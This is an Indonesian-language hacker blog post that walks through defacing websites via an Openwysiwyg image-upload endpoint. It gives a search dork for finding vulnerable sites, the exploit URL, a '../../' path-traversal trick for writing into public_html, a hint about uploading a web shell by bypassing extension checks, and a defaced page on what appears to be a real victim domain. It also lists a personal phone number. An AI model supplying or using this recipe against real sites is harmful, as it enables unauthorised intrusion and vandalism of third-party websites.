Deface Method Openwysiwyg upload image

Assalamualaikum Wr.Wb
Yoo yoo yooo guys kembali lagi bersama gw #Sky_ID

Oke guys jdi di blog kita hari ini saya akan memberikan cara deface poc Openwysiwyg upload image remote path

Oke guys lgsg aja to the point

Allowed  file Type: png,jpg,gif,bmp
Note:
(kalian bisa up shell jika kalian pro bypas ext)

Alat tempur
-Hp/Pc/Laptop
-Internet
-Browser
-Dork
Kalian bisa gunakan dork ini: inurl:/addons/imagelibrary/

-Exploit /addons/imagelibrary/insert_image.php?wysiwyg=isi

Example:
http://site.com/path/addons/imagelibrary/insert_image.php?wysiwyg=isi
Default path:
http://site.com/uploads/

Remote path gunakan burpsite atau juga dibagian param ?wysiwyg=isi dibagian "isi" ganti dengan "../../" agar bisa ke /public_html/
Dan sesuaikan dengan path nya ster

Selebihnya use your brain:v

Oke pertama²kita nge dork dlu

pilih salah satu target

Jika sudah, kita tambahkan exploitnya

Jika sudah di tambahkan exploit, maka tampilanny akan seperti ini

Lalu kalian upload img kalian
Jika sudah tinggal kalian panggil img kalian

cara manggil nya:
http://site.com/namaimg.png
http://site.com/addons/imagelibrary/namaimg.png
http://site.com/addons/namaimg.png

Ini hasil saya:
https://www.em.com.eg/ic_launcher.png


Oke guys mungkin sampe disini dlu, jika kalian bingung bisa hubungi saya
+6281905867552

Oke guys sekian dari saya Terimakasih>//<

Wassalamualaikum Wr.Wb